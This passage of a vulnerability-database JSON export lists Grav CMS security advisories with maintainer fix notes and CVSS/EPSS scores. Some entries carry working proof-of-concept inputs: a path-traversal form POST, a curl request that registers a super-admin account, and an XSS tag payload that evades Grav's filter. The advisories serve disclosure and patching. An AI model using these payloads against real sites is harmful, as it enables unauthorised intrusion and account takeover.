true) : $folder;\n```\n\nLack of sanitization on the sessionId (the raw session identifier) allows the use of `../` sequences. When `findResource` resolves the stream, it allows escape into any writable directory within the webserver's scope (typically `user/config/`, `cache/`, `logs/`, and `tmp/`).\n\n## Affected Versions & Zero-Day Status\n\n- Tested Version: v1.7.49.5 (Latest Stable Release as of Nov 2025).\n- Development Branch Status: Vulnerable. The latest source code in the GitHub develop branch (March 2026) remains unpatched.\n- Affected Range: All Grav CMS versions utilizing the FormFlash component (v1.7.x and potentially older v1.6.x versions).\n- CVE Status: Zero-Day (Non-Registered). Extensive research confirmed no existing CVE addresses this specific core FormFlash session-based traversal.\n\n## Steps to Reproduce\n\n1. Identify any page containing a Grav Form (e.g., `/contact`).\n2. Intercept the POST request during form submission.\n3. Modify the `__form-flash-id` parameter to include a traversal sequence targeting a writable directory (e.g., `../../user/config/proof_dir`).\n4. Submit the request.\n5. Observe that a new directory (`poc/`) and file (`index.yaml`) have been created at the traversed path.\n\n## Request Example\n\n```http\nPOST /contact HTTP/1.1\nHost: target.grav.cms\nContent-Type: application/x-www-form-urlencoded\n\n__form-name-=contact&__form-flash-id=../../user/config/proof_dir&form-data[name]=Attack&form-data[message]=Payload\n```\n\n## Response / Result\n\n- HTTP/1.1 302 Found (Standard redirect)\n- Filesystem Modification:\n - Directory Created: `/var/www/html/user/config/proof_dir/poc/`\n - File Created: `/var/www/html/user/config/proof_dir/poc/index.yaml`\n\n## Proof of Concept Evidence (Before/After)\n\n### Before Exploitation\n\n- Status: Directory does not exist.\n- Evidence:\n\n```bash\n$ ls -la /var/www/html/user/config/proof_dir/\nls: cannot access '/var/www/html/user/config/proof_dir/': No such file or directory\n```\n\n### After Exploitation\n\n- Status: Arbitrary directory and `index.yaml` created.\n- Evidence:\n\n```bash\n$ ls -la /var/www/html/user/config/proof_dir/poc/index.yaml\n-rw-rw-r-- 1 www-data www-data 158 Mar 23 22:15 /var/www/html/user/config/proof_dir/poc/index.yaml\n$ cat /var/www/html/user/config/proof_dir/poc/index.yaml\nform: ''\nid: ''\nunique_id: poc\n...\ndata:\n poc_status: confirmed\n```\n\n## Impact\n\n- Clarified Cross-User Attack: By controlling the session identifier, an attacker can overwrite or interfere with other users temporary form data, breaking session isolation.\n- Configuration Injection: Writing `index.yaml` into plugin/theme configuration subdirectories can alter application behavior or inject malicious settings.\n- Data Integrity: Unauthorized modification of configuration subfolders can lead to widespread site corruption or logical bypasses.\n- Denial of Service (DoS): Recursive directory creation enables attackers to exhaust disk space or inodes (inode exhaustion).\n\n## Attack Requirements\n\n- Authentication: None (Unauthenticated)\n- Configuration: Standard Grav installation with at least one form-enabled page (e.g., Contact, Login, Registration)\n\n## Exploitability Assessment\n\n- Complexity: Low. Requires only basic HTTP POST parameters.\n- Reliability: 100% (Deterministically reproducible in vulnerable versions).\n- Severity: Critical / High. The vulnerability requires no authentication and allows filesystem manipulation and session data corruption.\n\n## Remediation\n\n1. Sanitize Session IDs: Apply `basename()` or a strict alphanumeric regex to the `session_id` in FormFlash before path construction.\n2. Filesystem Hardening: Ensure `user/config/` and other sensitive directories have restrictive permissions preventing the webserver from creating new subdirectories.\n3. Update Grav: Monitor for patches addressing FormFlash sanitization.\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`d904efc33`](https://github.com/getgrav/grav/commit/d904efc33) — will ship in **2.0.0-beta.2**.\n\n**What changed:** `FormFlash::__construct()` now sanitizes `session_id`, `unique_id`, and `id` through a strict `[A-Za-z0-9,_-]{1,64}` allowlist before any path is constructed from them. Invalid values collapse to `''`, which causes `save()`/`delete()`/`getTmpDir()` to no-op — so a `__form-flash-id=../../user/config/proof_dir` POST simply does nothing on disk.\n\n**Files:**\n\n- [`system/src/Grav/Framework/Form/FormFlash.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Framework/Form/FormFlash.php)\n- [`tests/unit/Grav/Common/Security/FormFlashSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/FormFlashSecurityTest.php) — 32 test cases covering the PoC + variants.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42608", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00121", "scoring_system": "epss", "scoring_elements": "0.30653", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42608" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47" }, { "reference_url": "https://github.com/getgrav/grav/commit/d904efc33e03ebb597afde8d3368b28cf0423632", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/d904efc33e03ebb597afde8d3368b28cf0423632" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-hmcx-ch82-3fv2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-11T16:07:43Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-hmcx-ch82-3fv2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42608", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42608" }, { "reference_url": "https://github.com/advisories/GHSA-hmcx-ch82-3fv2", "reference_id": "GHSA-hmcx-ch82-3fv2", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-hmcx-ch82-3fv2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-42608", "GHSA-hmcx-ch82-3fv2" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-seer-x4fd-e7ge" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49320?format=api", "vulnerability_id": "VCID-ss11-shq5-qqae", "summary": "Grav vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/pages/[page]` parameter `data[header][template]` in Advanced Tab\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][template]` parameter. The script is saved within the page's frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view.\n\n---", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66310", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.07273", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66310" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:03:09Z/" } ], "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66310", "reference_id": "CVE-2025-66310", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66310" }, { "reference_url": "https://github.com/advisories/GHSA-7g78-5g5g-mvfj", "reference_id": "GHSA-7g78-5g5g-mvfj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7g78-5g5g-mvfj" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj", "reference_id": "GHSA-7g78-5g5g-mvfj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:03:09Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66310", "GHSA-7g78-5g5g-mvfj" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ss11-shq5-qqae" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91970?format=api", "vulnerability_id": "VCID-tkxm-vt8p-tqgv", "summary": "Grav Vulnerable to Privilege Escalation via Missing Server-Side Validation of groups/access\n# Bug Report: Registration Privilege Escalation via Missing Server-Side Validation of groups/access\n\n## Summary\n\nThe `Login::register()` method in the Login plugin accepts attacker-controlled `groups` and `access` fields from the registration POST data without server-side validation. When registration is enabled and `groups` or `access` are included in the configured allowed fields list, an unauthenticated user can self-register with `admin.super` privileges by injecting these fields into the registration request.\n\nThis is a missing server-side validation issue — the only defense is a config-level `fields` allowlist, which is an admin-facing setting, not a hardcoded security boundary.\n\n## Affected Component\n\n- **File:** `user/plugins/login/classes/Login.php`, lines 246-306\n- **Method:** `Login::register()`\n- **Validation:** `Login::validateField()`, lines 363-432\n- **Plugin:** Login Plugin 3.8.0\n- **Grav:** 1.8.0-beta.29\n\n## Root Cause\n\nIn `register()` (lines 254-267), the `groups` and `access` fields are only set to config defaults **if they are not already present in the input data**:\n\n```php\n// Line 254-260\nif (!isset($data['groups'])) {\n $groups = (array) $this->config->get('plugins.login.user_registration.groups', []);\n if (count($groups) > 0) {\n $data['groups'] = $groups;\n }\n}\n\n// Line 262-267\nif (!isset($data['access'])) {\n $access = (array) $this->config->get('plugins.login.user_registration.access.site', []);\n if (count($access) > 0) {\n $data['access']['site'] = $access;\n }\n}\n```\n\nIf an attacker **includes** `groups` or `access` in the POST body, the `!isset()` check passes and the config defaults are skipped. The attacker's values flow through unchanged.\n\nLater (lines 298-303), these values are assigned directly to the user object:\n\n```php\nif (isset($data['groups'])) {\n $user->groups = $data['groups']; // attacker-controlled\n}\nif (isset($data['access'])) {\n $user->access = $data['access']; // attacker-controlled\n}\n$user->save();\n```\n\nThe `validateField()` method (lines 363-432) has a `switch` statement that only validates: `username`, `password`, `password2`, `email`, `permissions`, `state`, and `language`. The `groups` and `access` fields pass through the `default` case with **no validation at all**.\n\n## Precondition\n\nRegistration must be enabled with `groups` and/or `access` in the configured allowed fields:\n\n```yaml\n# user/config/plugins/login.yaml\nuser_registration:\n enabled: true\n fields:\n - username\n - password\n - email\n - fullname\n - groups # ← enables the attack\n - access # ← enables the attack\n```\n\nThis is a configuration the admin UI allows without any warning. An admin adding `groups` to let users pick a non-privileged group (e.g., `editors`) unknowingly exposes the escalation path, since there is no validation constraining which groups can be selected.\n\n## Proof of Concept\n\n### Malicious registration request (unauthenticated):\n\n```bash\ncurl -X POST \"${TARGET}/user_register\" \\\n --data-urlencode \"data[username]=attacker\" \\\n --data-urlencode \"data[password1]=Str0ngP@ss!\" \\\n --data-urlencode \"data[password2]=Str0ngP@ss!\" \\\n --data-urlencode \"data[email]=attacker@evil.com\" \\\n --data-urlencode \"data[fullname]=Attacker\" \\\n --data-urlencode \"data[groups][]=admins\" \\\n --data-urlencode \"data[access][admin][login]=true\" \\\n --data-urlencode \"data[access][admin][super]=true\" \\\n --data-urlencode \"data[access][site][login]=true\" \\\n --data-urlencode \"form-nonce=${FORM_NONCE}\" \\\n --data-urlencode \"__form-name__=user_register\" \\\n --data-urlencode \"__unique_form_id__=${FORM_UID}\"\n```\n\n### Resulting account file (`user/accounts/attacker.yaml`):\n\n```yaml\nemail: attacker@evil.com\nfullname: Attacker\ngroups:\n - admins\naccess:\n admin:\n login: true\n super: true\n site:\n login: true\nhashed_password: ...\nstate: enabled\n```\n\nThe attacker can then log into `/admin` with full super-admin privileges.\n\n## Impact\n\n- **Severity:** Critical (when precondition is met)\n- **Vector:** Unauthenticated → Super Admin\n- **Escalation:** Full admin panel access, which chains to RCE via known admin vectors https://github.com/getgrav/grav/security/advisories/GHSA-4fg4-8cr8-326m or Plugin Upload\n- **Precondition:** Registration enabled with `groups` or `access` in allowed fields — a configuration the admin UI permits without warning\n\n\n## Environment\n\n- Grav Core: 1.8.0-beta.29\n- Login Plugin: 3.8.0\n- PHP: 8.4.11\n\n## Credits\n\nJonathan Dersch at Hacking Cult GmbH https://hackingcult.de/\n\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in **grav-plugin-login 3.8.2** (commit [`3d419a0`](https://github.com/getgrav/grav-plugin-login/commit/3d419a0)). On the Grav 2.0 line, the login plugin is pinned at `>=3.8.2` by admin2's [`blueprints.yaml`](https://github.com/getgrav/grav-plugin-admin2/blob/develop/blueprints.yaml), so sites running admin2 with Grav **2.0.0-beta.2** pick the fix up automatically.\n\n**What changed:** the registration form handler now explicitly skips the `groups` and `access` privilege fields in the per-field input loop — even if an administrator added them to `user_registration.fields`. A warning is logged on any attempted injection. Server-side `default_values`, invitations, and the `user_registration.{groups,access}` config remain the sole sources of those values.\n\n**Files:**\n- [`login.php`](https://github.com/getgrav/grav-plugin-login/blob/develop/login.php) — form handler privilege-field strip.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42613", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.0666", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42613" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav-plugin-login/commit/3d419a0dabd70aed1fd49afcd5919004a4141da1", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:47:25Z/" } ], "url": "https://github.com/getgrav/grav-plugin-login/commit/3d419a0dabd70aed1fd49afcd5919004a4141da1" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-pxm6-mhxr-q4mj", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-12T13:47:25Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-pxm6-mhxr-q4mj" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-w48r-jppp-rcfw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42613", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42613" }, { "reference_url": "https://github.com/advisories/GHSA-pxm6-mhxr-q4mj", "reference_id": "GHSA-pxm6-mhxr-q4mj", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-pxm6-mhxr-q4mj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-42613", "GHSA-pxm6-mhxr-q4mj" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tkxm-vt8p-tqgv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95218?format=api", "vulnerability_id": "VCID-u7yn-d7uj-57bh", "summary": "Grav Vulnerable to XSS via Taxonomy Field Values in Admin Panel\n### Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability exists in the Grav CMS Form plugin's select field template. Taxonomy tag and category values are rendered with the Twig `|raw` filter in the admin panel, bypassing the global autoescape protection. An editor-level user can inject arbitrary JavaScript that executes in any administrator's browser session when they view or edit any page in the admin panel.\n\nAdditionally, Grav's built-in XSS detection (`Security::detectXss()`) can be bypassed by using payloads that close the `<option>/<select>` context and use unquoted event handlers - the `on_events` regex fails to match event handlers without quotes or trailing spaces before `>`.\n\n### Important\n\n- The vulnerability is in the Form plugin (`select.html.twig`), which is installed by default with Grav\n- The XSS is cross-page: a malicious taxonomy value on one page executes when an admin edits any page, because taxonomy options are rendered from a shared global pool\n- An editor can exploit this without any other vulnerability - taxonomy fields are not in the server-side restricted fields list\n- The `HttpOnly` flag on session cookies prevents direct session theft, but the XSS can steal the admin nonce and perform privileged actions via JavaScript\n\n### Permissions Needed\n\n- Editor: can create or edit pages and set taxonomy tag/category values\n\n### Details\n\nThe Form plugin's select field template renders option values using the `|raw` Twig filter, which outputs content without HTML escaping:\n\nFile: `user/plugins/form/templates/forms/fields/select/select.html.twig`\n\n```twig\n{# Line 55 #}\n avalue|raw \n\n{# Line 65 #}\n suboption|t|raw \n\n{# Line 72 #}\n item_value|t|raw \n```\n\nThe taxonomy field in the page editor uses this select template. When a page has taxonomy values (tags, categories), these values are populated as `<option>` elements in the select dropdown. The `value` attribute is properly escaped by the browser's attribute encoding, but the **display text** between `<option>` tags is rendered raw:\n\n```html\n<option value=\"<script>alert(1)</script>\"><script>alert(1)</script></option>\n```\n\nSince taxonomy options are collected globally across all pages (to provide autocomplete/selection), a malicious taxonomy value on any page will appear in the taxonomy dropdown of every page editor - making this a cross-page stored XSS.\n\nThe server-side field restriction in the flex-objects plugin only blocks `['form', 'forms', 'process', 'twig']` for non-super users. Taxonomy fields are not restricted, so editors can freely set arbitrary taxonomy values.\n\n### XSS Detection Bypass\n\nGrav's `Security::detectXss()` checks for `dangerous_tags` (e.g., `<script>`, `<iframe>`), `on_events` (event handlers), and `invalid_protocols` (e.g., `javascript:`). However, the `on_events` regex:\n\n```php\n'on_events' => '#(<[^>]+[a-z\\x00-\\x20\"\\'\\/)(?:on[a-z]+)\\s*=[\\s|\\'\"'].*[\\s|\\'\"']>#iUu'\n```\n\nrequires either quotes around the handler value or a trailing space before `>`. An unquoted handler like `onerror=alert(1)>` (no space before `>`) bypasses this check entirely.\n\nCombined with `</option></select>` to break out of the select context (neither tag is in `dangerous_tags`), the full payload evades all three detection layers and triggers no XSS warning in the admin panel.\n\n### PoC\n\n#### Step 1: Login as Editor\nNavigate to `http://TARGET/admin/` and authenticate with editor credentials.\n\n#### Step 2: Create a Page with Malicious Taxonomy\n- Go to Pages → Add → Add Page\n- Title: `XSS via editor`\n- Go to **Options** Tap\n- On Taxonomies, Add tag:\n```\n</option></select><img src=x onerror=alert('XSS-via-editor')>\n```\n\nThis payload:\n- Closes `</option></select>` to break out of the select dropdown context\n- Injects an `<img>` tag with an unquoted `onerror` handler (bypasses `on_events` regex)\n- Is not in the `dangerous_tags` list (no `<script>`, `<iframe>`, etc.)\n- Triggers no XSS warning in the admin panel\n\n<img width=\"1221\" height=\"857\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6223cbb2-f04b-46bd-89ce-828c89ad77ab\" />\n\n#### Step 3: Trigger the XSS\nWhen any administrator navigates to the page editor of any page (not just the malicious one), the JavaScript executes immediately.\n\n<img width=\"1224\" height=\"856\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f008b0f2-dedb-4b22-a74a-cdc0d7325cb4\" />\n\nThe XSS fires because taxonomy tag options are collected globally across all pages and rendered with `|raw` in the select dropdown template. The payload breaks out of the `<option>` context, and the browser renders the `<img>` tag as a regular DOM element.\n\n### Impact\n\n- Session hijacking: While `HttpOnly` prevents direct cookie theft, the XSS can steal the admin nonce token and perform any admin action via AJAX requests\n- Privilege escalation: An editor can perform admin-only actions (create users, modify system configuration, install plugins) through the hijacked admin session\n- Cross-page impact: A single malicious taxonomy value affects the entire admin panel - every page editor view is compromised\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed across two repos:\n\n1. **grav-plugin-form 9.0.1** (commit [`6bffb4c`](https://github.com/getgrav/grav-plugin-form/commit/6bffb4c)) — the primary fix. All four `|raw` filters in [`templates/forms/fields/select/select.html.twig`](https://github.com/getgrav/grav-plugin-form/blob/develop/templates/forms/fields/select/select.html.twig) (placeholder, avalue, suboption, item_value) have been removed. Option labels — including taxonomy values that propagate cross-page through the admin's shared selection pool — now go through Twig's default escaper, so a lower-privileged editor can no longer inject script that runs in an admin's browser when they open any page editor.\n\n2. **Grav core on the `2.0` branch** (commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8), ships in **2.0.0-beta.2**) — closes the detection-bypass half of the report. The `on_events` regex in `Security::detectXss()` is tightened so unquoted handlers like `onerror=alert(1)>` are flagged (see separate GHSA-9695-8fr9-hw5q), and `option`/`select` have been added to default `security.xss_dangerous_tags` so `</option></select>…` tripwires the detector (see separate GHSA-w8cg-7jcj-4vv2).\n\nSites running admin2 on Grav 2.0.0-beta.2 get the 9.0.1 form plugin automatically via its existing dependency graph.\n\n**Files:**\n- [`templates/forms/fields/select/select.html.twig`](https://github.com/getgrav/grav-plugin-form/blob/develop/templates/forms/fields/select/select.html.twig) — four `|raw` removed.\n- [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml) — dangerous-tags list extended.\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php) — `on_events` regex tightened.\n- [`tests/unit/Grav/Common/Security/DetectXssTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/DetectXssTest.php) — includes the GHSA-c2q3 PoC payload.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42842", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.0886", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42842" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663" }, { "reference_url": "https://github.com/getgrav/grav-plugin-form/commit/6bffb4c98be468a155d1656544ec45bb4a443957", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:24:43Z/" } ], "url": "https://github.com/getgrav/grav-plugin-form/commit/6bffb4c98be468a155d1656544ec45bb4a443957" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-c2q3-p4jr-c55f", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:24:43Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-c2q3-p4jr-c55f" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42842", 